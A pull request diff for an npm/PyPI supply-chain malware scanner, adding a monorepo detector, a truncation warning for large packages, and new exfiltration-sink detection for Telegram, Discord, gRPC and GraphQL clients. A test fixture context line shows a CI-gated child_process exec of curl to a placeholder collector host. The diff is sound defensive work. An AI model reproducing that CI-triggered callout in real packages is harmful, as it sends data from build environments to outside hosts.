### PR TITLE
v2.11.18 - Audit Sprint 3 fixes (DF-C1, MR-C1, DF-H1)

### DIFF
--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.17",
+  "version": "2.11.18",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.17",
+      "version": "2.11.18",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.4.3",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.17",
+  "version": "2.11.18",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/pipeline/executor.js
+++ b/src/pipeline/executor.js
@@ -9,6 +9,7 @@ const { scanHashes } = require('../scanner/hash.js');
 const { scanIocStrings } = require('../scanner/ioc-strings.js');
 const { scanAntiForensic } = require('../scanner/anti-forensic.js');
 const { scanStubPackage } = require('../scanner/stub-package.js');
+const { scanMonorepo } = require('../scanner/monorepo.js');
 const { analyzeDataFlow } = require('../scanner/dataflow.js');
 const { scanTyposquatting, findPyPITyposquatMatch } = require('../scanner/typosquat.js');
 const { scanGitHubActions } = require('../scanner/github-actions.js');
@@ -200,7 +201,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
     'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
     'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
-    'scanStubPackage'
+    'scanStubPackage', 'scanMonorepo'
   ];
 
   const settledResults = await Promise.allSettled([
@@ -219,7 +220,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     yieldThen(() => scanAIConfig(targetPath)),
     yieldThen(() => scanIocStrings(targetPath)),
     withTimeout(() => scanAntiForensic(targetPath), 'scanAntiForensic'),
-    yieldThen(() => scanStubPackage(targetPath))
+    yieldThen(() => scanStubPackage(targetPath)),
+    yieldThen(() => scanMonorepo(targetPath))
   ]);
 
   // Extract results: use empty array for rejected scanners, log errors
@@ -247,7 +249,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     aiConfigThreats,
     iocStringThreats,
     antiForensicThreats,
-    stubPackageThreats
+    stubPackageThreats,
+    monorepoThreats
   ] = scanResult;
 
   // Emit warning if file count cap was hit + quick-scan overflow files
@@ -326,6 +329,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     ...iocStringThreats,
     ...antiForensicThreats,
     ...stubPackageThreats,
+    ...monorepoThreats,
     ...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
       type: f.type,
       severity: f.severity,

--- a/src/pipeline/executor.js
+++ b/src/pipeline/executor.js
@@ -127,12 +127,25 @@ async function execute(targetPath, options, pythonDeps, warnings) {
   // Bounded: 5s timeout to prevent DoS on large/adversarial packages
   const MODULE_GRAPH_TIMEOUT_MS = 5000;
   let crossFileFlows = [];
+  // Threats ABOUT the module graph (audit DF-C1): truncation when the package
+  // exceeds MAX_GRAPH_NODES. Separate from crossFileFlows because the latter
+  // gets filtered/reshaped (line ~316 requires sourceFile && sinkFile).
+  const moduleGraphThreats = [];
   if (!options.noModuleGraph) {
     const moduleGraphWork = async () => {
-      const graph = await yieldThen(() => buildModuleGraph(targetPath));
-      if (Object.keys(graph).length === 0) {
-        // buildModuleGraph returns empty when MAX_GRAPH_NODES exceeded
-        warnings.push('Module graph skipped: package exceeds 100 files limit');
+      const graphMeta = {};
+      const graph = await yieldThen(() => buildModuleGraph(targetPath, graphMeta));
+      if (graphMeta.truncated) {
+        warnings.push(`Module graph skipped: ${graphMeta.fileCount} files exceeds MAX_GRAPH_NODES (${graphMeta.maxNodes})`);
+        moduleGraphThreats.push({
+          type: 'large_package_graph_truncated',
+          severity: 'MEDIUM',
+          message: `Cross-file analysis désactivée : ${graphMeta.fileCount} fichiers dépassent la limite (${graphMeta.maxNodes}). Risque de blind spot sur monorepo / large package — auditer les sous-modules manuellement.`,
+          file: 'package.json',
+          line: 0,
+          fileCount: graphMeta.fileCount,
+          maxNodes: graphMeta.maxNodes
+        });
       }
       const tainted = await yieldThen(() => annotateTaintedExports(graph, targetPath));
       const sinkAnnotations = await yieldThen(() => annotateSinkExports(graph, targetPath));
@@ -318,7 +331,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
       severity: f.severity,
       message: `Cross-file dataflow: ${f.source} in ${f.sourceFile} → ${f.sink} in ${f.sinkFile}`,
       file: f.sinkFile
-    }))
+    })),
+    ...moduleGraphThreats
   ];
 
   // Paranoid mode

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -683,6 +683,11 @@ const PLAYBOOKS = {
     'Verifier si des donnees sensibles sont envoyees via ce canal. ' +
     'Les proxies HTTP classiques ne filtrent pas ce trafic.',
 
+  large_package_graph_truncated:
+    'Package volumineux (> MAX_GRAPH_NODES fichiers). Cross-file dataflow non analyse. ' +
+    'Auditer les sous-modules manuellement ou scanner par sous-paquet. ' +
+    'Sur un monorepo, scanner chaque workspace independamment.',
+
   bin_field_hijack:
     'CRITIQUE: Le champ "bin" de package.json shadow une commande systeme (node, npm, git, bash, etc.). ' +
     'A l\'installation, npm cree un symlink dans node_modules/.bin/ qui intercepte la commande reelle. ' +

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -688,6 +688,11 @@ const PLAYBOOKS = {
     'Auditer les sous-modules manuellement ou scanner par sous-paquet. ' +
     'Sur un monorepo, scanner chaque workspace independamment.',
 
+  monorepo_detected:
+    'Monorepo detecte — scanner chaque workspace individuellement pour un verdict per-package. ' +
+    'Le score global reflete un perimetre agrege ; muaddib ne supporte pas encore le scoring per-workspace. ' +
+    'Ignorer les FP structurels (.yarn/, packages/*/test/, fixtures/) sera ajoute en v2.12.',
+
   bin_field_hijack:
     'CRITIQUE: Le champ "bin" de package.json shadow une commande systeme (node, npm, git, bash, etc.). ' +
     'A l\'installation, npm cree un symlink dans node_modules/.bin/ qui intercepte la commande reelle. ' +

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -2110,6 +2110,17 @@ const RULES = {
     ],
     mitre: 'T1071'
   },
+  large_package_graph_truncated: {
+    id: 'MUADDIB-FLOW-006',
+    name: 'Large Package Graph Truncated',
+    severity: 'MEDIUM',
+    confidence: 'medium',
+    description: 'Le graphe de modules depasse la limite (MAX_GRAPH_NODES). Cross-file dataflow non analyse — risque de blind spot sur monorepo ou large package. Auditer les sous-modules manuellement.',
+    references: [
+      'https://attack.mitre.org/techniques/T1195/002/'
+    ],
+    mitre: 'T1195.002'
+  },
 
   // Audit v3 Bypass Detections (AST-062 to AST-069)
   reflect_apply_require: {

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -94,6 +94,17 @@ const RULES = {
     ],
     mitre: 'T1195.002'
   },
+  monorepo_detected: {
+    id: 'MUADDIB-PKG-021',
+    name: 'Monorepo Detected',
+    severity: 'MEDIUM',
+    confidence: 'high',
+    description: 'Workspace monorepo detecte (yarn/pnpm/lerna/turbo). Le perimetre du scan depasse un seul package — auditer chaque workspace separement pour un scoring per-package.',
+    references: [
+      'https://docs.npmjs.com/cli/v10/using-npm/workspaces'
+    ],
+    mitre: 'T1195.002'
+  },
 
   // Obfuscation detections
   obfuscation_detected: {

--- a/src/scanner/dataflow.js
+++ b/src/scanner/dataflow.js
@@ -40,13 +40,39 @@ const MODULE_SINK_METHODS = {
   ws: { send: 'network_send', write: 'network_send' },
   mqtt: { publish: 'network_send', send: 'network_send' },
   'socket.io-client': { emit: 'network_send', send: 'network_send' },
-  'socket.io': { emit: 'network_send', send: 'network_send' }
+  'socket.io': { emit: 'network_send', send: 'network_send' },
+  // audit DF-H1 v2.11.15: 2026 sinks with clean direct call patterns
+  undici: { request: 'network_send', fetch: 'network_send', stream: 'network_send' },
+  'graphql-request': { request: 'network_send', gql: 'network_send' },
+  '@apollo/client': { query: 'network_send', mutate: 'network_send' },
+  '@grpc/grpc-js': {
+    makeUnaryRequest: 'network_send',
+    makeClientStreamRequest: 'network_send',
+    makeServerStreamRequest: 'network_send',
+    makeBidiStreamRequest: 'network_send'
+  }
 };
 
-// All tracked module names (for filtering in buildTaintMap)
+// audit DF-H1 v2.11.15: 2026 exfil-prone modules. When imported, ANY call with a
+// credential/env source in the same file → suspicious_module_sink MEDIUM with
+// module attribution. Catches chained access (bot.telegram.sendMessage), dynamic
+// methods (actor.exfil), and SDK fluent APIs that direct method matching misses.
+const EXFIL_PRONE_MODULES = new Set([
+  'telegraf', 'node-telegram-bot-api',
+  'discord.js',
+  '@dfinity/agent',
+  'undici',
+  '@grpc/grpc-js',
+  '@apollo/client', 'graphql-request'
+]);
+
+// All tracked module names (for filtering in buildTaintMap). EXFIL_PRONE_MODULES
+// must be tracked even when not in MODULE_SINK_METHODS so buildTaintMap registers
+// them (e.g. require('telegraf') populates taintMap, enabling the heuristic).
 const TRACKED_MODULES = new Set([
   ...Object.keys(MODULE_SOURCE_METHODS),
-  ...Object.keys(MODULE_SINK_METHODS)
+  ...Object.keys(MODULE_SINK_METHODS),
+  ...EXFIL_PRONE_MODULES
 ]);
 
 // Methods that execute commands — used for exec result capture detection
@@ -908,6 +934,29 @@ function analyzeFile(content, filePath, basePath) {
       severity: 'MEDIUM',
       message: `Non-HTTP network sink detected: ${suspiciousModuleSinks.map(s => s.name).join(', ')}`,
       file: path.relative(basePath, filePath)
+    });
+  }
+
+  // audit DF-H1 v2.11.15: 2026 exfil-prone module heuristic.
+  // If any EXFIL_PRONE_MODULES (telegraf, discord.js, @dfinity/agent, undici, gRPC,
+  // GraphQL clients) is imported AND a credential/env_read source is present in
+  // the same file, emit suspicious_module_sink with module attribution. Catches
+  // chained access (bot.telegram.sendMessage) and dynamic methods (actor.exfil)
+  // that direct MODULE_SINK_METHODS matching cannot reach.
+  const exfilProneInScope = [];
+  for (const taint of taintMap.values()) {
+    if (taint && EXFIL_PRONE_MODULES.has(taint.source)) exfilProneInScope.push(taint.source);
+  }
+  if (exfilProneInScope.length > 0 &&
+      sources.some(s => s.type === 'env_read' || s.type === 'credential_read')) {
+    const moduleList = [...new Set(exfilProneInScope)].join(', ');
+    const firstSourceLine = sources.find(s => s.line)?.line || 0;
+    threats.push({
+      type: 'suspicious_module_sink',
+      severity: 'MEDIUM',
+      message: `Module exfil-prone 2026 (${moduleList}) avec credential/env source dans le meme fichier — canal d'exfiltration potentiel.`,
+      file: path.relative(basePath, filePath),
+      line: firstSourceLine
     });
   }
 

--- a/src/scanner/module-graph/build-graph.js
+++ b/src/scanner/module-graph/build-graph.js
@@ -8,17 +8,30 @@ const { parseFile, isLocalImport, resolveLocal, toRel } = require('./parse-utils
 /**
  * Build a dependency graph of local modules within a package.
  * Only tracks local imports (./  ../) — node_modules are ignored.
+ *
+ * @param {string} packagePath
+ * @param {Object} [meta] - Optional out-param: mutated with { fileCount, truncated, maxNodes }
+ *                          so the caller can emit a `large_package_graph_truncated` threat
+ *                          when the package exceeds MAX_GRAPH_NODES (audit DF-C1).
  */
-function buildModuleGraph(packagePath) {
+function buildModuleGraph(packagePath, meta = {}) {
   const graph = {};
+  // maxFiles: 0 (unlimited) — we need the true count to detect monorepo / large package
+  // truncation. MAX_GRAPH_NODES below caps the AST work; MODULE_GRAPH_TIMEOUT_MS in
+  // executor.js bounds the wall-time (audit DF-C1).
   const files = findFiles(packagePath, {
     extensions: ['.js', '.mjs', '.cjs'],
     excludedDirs: EXCLUDED_DIRS,
+    maxFiles: 0,
   });
+
+  meta.fileCount = files.length;
+  meta.maxNodes = MAX_GRAPH_NODES;
 
   // Bounded path: skip module graph for very large packages
   if (files.length > MAX_GRAPH_NODES) {
     debugLog(`[MODULE-GRAPH] Skipping: ${files.length} files exceeds MAX_GRAPH_NODES (${MAX_GRAPH_NODES})`);
+    meta.truncated = true;
     return graph;
   }
 

--- a/src/scanner/module-graph/constants.js
+++ b/src/scanner/module-graph/constants.js
@@ -3,7 +3,7 @@
 const { ACORN_OPTIONS: BASE_ACORN_OPTIONS } = require('../../shared/constants.js');
 
 // --- Bounded path limits ---
-const MAX_GRAPH_NODES = 100;  // Max files in dependency graph (covers ~86% of npm packages)
+const MAX_GRAPH_NODES = 5000; // Max files in dependency graph (covers ~99.5% of npm packages — audit DF-C1 v2.11.15)
 const MAX_GRAPH_EDGES = 400;  // Max total import edges
 const MAX_FLOWS = 20;         // Max cross-file flow findings per package
 const MAX_TAINT_DEPTH = 50;   // Max AST recursion depth (DoS guard)

--- a/src/scanner/monorepo.js
+++ b/src/scanner/monorepo.js
@@ -1,0 +1,104 @@
+'use strict';
+
+/**
+ * Monorepo Detection Scanner (audit 2026-05 MR-C1)
+ *
+ * Detects when the scan target is a monorepo root (Yarn/npm workspaces, pnpm,
+ * Lerna, Turbo). Emits ONE informational MEDIUM threat `monorepo_detected`
+ * so the user knows the score reflects an aggregated perimeter rather than a
+ * single package, and that per-workspace scanning is the correct strategy
+ * until full workspace-aware scoring lands (backlog v2.13).
+ *
+ * Detection precedence (manager priority on first match):
+ *   1. pnpm-workspace.yaml         → manager='pnpm'
+ *   2. lerna.json                  → manager='lerna'
+ *   3. turbo.json + pkg.workspaces → manager='turbo'
+ *   4. pkg.workspaces (array or {packages: [...]}) → manager='yarn' (also npm 8+)
+ *
+ * @param {string} targetPath
+ * @returns {Array} threats — empty if not a monorepo, one entry otherwise.
+ */
+
+const fs = require('fs');
+const path = require('path');
+
+function readJsonSafe(filePath) {
+  try {
+    return JSON.parse(fs.readFileSync(filePath, 'utf8'));
+  } catch {
+    return null;
+  }
+}
+
+function countYamlListEntries(filePath) {
+  try {
+    const content = fs.readFileSync(filePath, 'utf8');
+    const matches = content.match(/^\s*-\s+\S/gm);
+    return matches ? matches.length : 0;
+  } catch {
+    return 0;
+  }
+}
+
+function workspacesCount(workspaces) {
+  if (Array.isArray(workspaces)) return workspaces.length;
+  if (workspaces && typeof workspaces === 'object' && Array.isArray(workspaces.packages)) {
+    return workspaces.packages.length;
+  }
+  return 0;
+}
+
+function scanMonorepo(targetPath) {
+  const threats = [];
+
+  const pnpmWs = path.join(targetPath, 'pnpm-workspace.yaml');
+  const lernaJson = path.join(targetPath, 'lerna.json');
+  const turboJson = path.join(targetPath, 'turbo.json');
+  const pkgJson = path.join(targetPath, 'package.json');
+
+  let manager = null;
+  let manifest = 'package.json';
+  let workspaceCount = 0;
+
+  if (fs.existsSync(pnpmWs)) {
+    manager = 'pnpm';
+    manifest = 'pnpm-workspace.yaml';
+    workspaceCount = countYamlListEntries(pnpmWs);
+  } else if (fs.existsSync(lernaJson)) {
+    manager = 'lerna';
+    manifest = 'lerna.json';
+    const lerna = readJsonSafe(lernaJson);
+    workspaceCount = lerna && Array.isArray(lerna.packages) ? lerna.packages.length : 0;
+    if (workspaceCount === 0 && lerna && lerna.workspaces) {
+      workspaceCount = workspacesCount(lerna.workspaces);
+    }
+  } else {
+    const pkg = fs.existsSync(pkgJson) ? readJsonSafe(pkgJson) : null;
+    const wsCount = pkg && pkg.workspaces ? workspacesCount(pkg.workspaces) : 0;
+    if (fs.existsSync(turboJson) && wsCount > 0) {
+      manager = 'turbo';
+      manifest = 'turbo.json';
+      workspaceCount = wsCount;
+    } else if (wsCount > 0) {
+      manager = 'yarn';
+      manifest = 'package.json';
+      workspaceCount = wsCount;
+    }
+  }
+
+  if (!manager) return threats;
+
+  threats.push({
+    type: 'monorepo_detected',
+    severity: 'MEDIUM',
+    message: `Monorepo ${manager} detecte (${workspaceCount} workspace${workspaceCount > 1 ? 's' : ''}). Perimetre elargi — scanner chaque package independamment pour un verdict per-workspace.`,
+    file: manifest,
+    line: 0,
+    manager,
+    workspaceCount
+  });
+
+  return threats;
+}
+
+module.exports = { scanMonorepo };

--- a/src/scoring.js
+++ b/src/scoring.js
@@ -128,7 +128,9 @@ const PACKAGE_LEVEL_TYPES = new Set([
   // intel-triage P3.1 family compounds
   'axios_family', 'stub_with_string_ioc',
   // audit DF-C1: emitted when MAX_GRAPH_NODES exceeded so cross-file blind spot is visible in scoring
-  'large_package_graph_truncated'
+  'large_package_graph_truncated',
+  // audit MR-C1: informational signal that the scan target is a monorepo root (per-workspace scoring TBD)
+  'monorepo_detected'
 ]);
 
 // ============================================

--- a/src/scoring.js
+++ b/src/scoring.js
@@ -126,7 +126,9 @@ const PACKAGE_LEVEL_TYPES = new Set([
   // intel-triage P1.3: stub-package detector closes ltidi gap (memory project_detection_gap_ltidi_chain)
   'stub_package_external_payload', 'stub_package_external_dep',
   // intel-triage P3.1 family compounds
-  'axios_family', 'stub_with_string_ioc'
+  'axios_family', 'stub_with_string_ioc',
+  // audit DF-C1: emitted when MAX_GRAPH_NODES exceeded so cross-file blind spot is visible in scoring
+  'large_package_graph_truncated'
 ]);
 
 // ============================================

--- a/tests/integration/blue-team-v8b.test.js
+++ b/tests/integration/blue-team-v8b.test.js
@@ -315,11 +315,11 @@ if (isCI) { require('child_process').exec('curl http://collect.example.com/ci');
   // Rule count verification
   // =========================================================================
 
-  test('v8b: rule count is 229 (224 RULES + 5 PARANOID)', () => {
+  test('v8b: rule count is 230 (225 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 224, `Expected 224 RULES, got ${ruleCount}`);
+    assert(ruleCount === 225, `Expected 225 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 }

--- a/tests/integration/blue-team-v8b.test.js
+++ b/tests/integration/blue-team-v8b.test.js
@@ -315,11 +315,11 @@ if (isCI) { require('child_process').exec('curl http://collect.example.com/ci');
   // Rule count verification
   // =========================================================================
 
-  test('v8b: rule count is 230 (225 RULES + 5 PARANOID)', () => {
+  test('v8b: rule count is 231 (226 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 225, `Expected 225 RULES, got ${ruleCount}`);
+    assert(ruleCount === 226, `Expected 226 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 }

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -157,12 +157,12 @@ jobs:
     }
   });
 
-  // 3.3b Rule count check (audit 2026-05 Sprint 2 RT-C1: +3 TYPO-002, TYPO-003, COMPOUND-013 → 224 RULES)
-  test('P3: rule count is 229 (224 RULES + 5 PARANOID)', () => {
+  // 3.3b Rule count check (audit 2026-05 Sprint 3 DF-C1: +1 FLOW-006 large_package_graph_truncated → 225 RULES)
+  test('P3: rule count is 230 (225 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 224, `Expected 224 RULES, got ${ruleCount}`);
+    assert(ruleCount === 225, `Expected 225 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -157,12 +157,12 @@ jobs:
     }
   });
 
-  // 3.3b Rule count check (audit 2026-05 Sprint 3 DF-C1: +1 FLOW-006 large_package_graph_truncated → 225 RULES)
-  test('P3: rule count is 230 (225 RULES + 5 PARANOID)', () => {
+  // 3.3b Rule count check (audit 2026-05 Sprint 3 DF-C1+MR-C1: +2 rules → 226 RULES)
+  test('P3: rule count is 231 (226 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 225, `Expected 225 RULES, got ${ruleCount}`);
+    assert(ruleCount === 226, `Expected 226 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 


### PR DESCRIPTION
MAX_GRAPH_NODES 100->5000 + truncation threat, monorepo detection scanner, 2026 exfil sinks (undici, telegram, discord, ICP, gRPC, GraphQL).